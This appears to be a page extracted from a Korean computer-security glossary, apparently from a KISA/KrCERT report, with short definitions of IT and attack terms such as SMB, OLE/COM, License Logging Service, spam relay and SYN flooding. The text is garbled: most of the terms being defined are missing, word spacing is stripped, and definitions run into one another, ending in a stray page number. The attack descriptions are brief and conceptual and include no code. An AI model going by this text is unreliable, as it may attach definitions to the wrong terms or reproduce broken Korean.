IRC에연결되어있는네트워크인터넷익스플로러가웹메일처럼 HTML문서를제작할수있도록해주는 ActiveX 컨트롤상대방의시스템에메일서버를설치하여스팸릴레이에악용하거나, 관심을끄는 을보냄으로써상대방이악성프로그램을설치하도록하는해킹기법으로주로스팸릴레이나악성프로그램의설치에이용됨응용프로그램들이 HTML 문서에서사용되는 Hyperlink 처리를위한기능을제공 Korea Computer Emergency Response Team Coordination Center의약어로, 국내외인터넷침해사고대응업무를수행하는한국대표침해사고대응팀 (CERT/CSIRT) 이며, KISA 인터넷침해대응센터가역할을수행 License Logging Service의약자로 MS서버제품에대한라이센스를고객이관리할수있도록해주는도구네트워크의기본적인입출력을정의한규약 Object Linking And Embedding, Component Object Model의약자로 MS의객체기반기술의일종으로서서로다른응용프로그램이나플랫폼이데이터를공유하는데사용 Portable Network Graphics의약자로 GIF나 JPEG처럼그림파일포맷의일종으로, 주로 UNIX/ LINUX 환경에서아이콘등에많이사용 Server Message Block의약자로파일이나네트워크폴더및프린터공유등에사용되는프로토콜 TCP 연결특성을이용한 DoS 공격의일종으로 Unreachable한주소로 IP를위조하여 Syn을보내서대상시스템이더이상의연결요청을받아들일수없도록만드는공격많은인원이동시에다양한정보공유와공동문서제작을위한웹사이트를제작하는데필요한서비스윈도우시스템의제반실행환경을제공해주는것으로 explorer.exe가책임을맡고있음

47